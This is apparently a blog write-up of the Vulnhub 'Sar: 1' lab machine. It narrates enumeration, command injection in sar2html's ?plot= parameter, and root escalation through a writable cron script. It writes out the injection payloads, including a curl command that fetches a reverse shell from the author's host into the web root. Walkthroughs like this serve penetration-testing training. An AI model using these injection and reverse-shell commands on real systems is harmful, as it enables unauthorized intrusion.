Vulnhub Sar: 1 Walkthrough

by Vince
in Blog
Hits: 7056

It's been a while since I've written up a box and Vulnhub just dumped a fresh batch so here we go...

The box description states:  "Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing." 

This is a solid entry level box.  Nothing complicated and going through standard enumeration should lead to a low privilege shell and root. 

We kick off with Nmap:


With only port 80 open, our options are limited.  Firing up Nikto:


A phpinfo file but aside from that, slim pickin's.  Looking at the web port in the browser:


Checking out robots.txt:


Ok, that's interesting.  We find this sar2html app:


As I'm poking around, I find this ?plot= page and I wonder if it's vulnerable to XSS:


Bingo!


It's hard to see but I'm terminating the statement and adding a command:  ?plot=;id


Excellent!  We have code execution.  I decide to look this up on Exploit-db:


We basically learn what we've already uncovered:


I come back with:  ?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php

Which basically writes a Pentest Monkey reverse shell to the web directory.  When we browse to our shell:


We catch our shell:



Snagging the user flag:


A little enumeration and we uncover a cron job:


We dig into the script:


We can't write into finally.sh but we can write into write.sh:


Reusing the shell we already have on the system, we call it from PHP and we wait (5 minutes) and:


We catch our shell and we go after the root flag.  #gameover

Fun little box.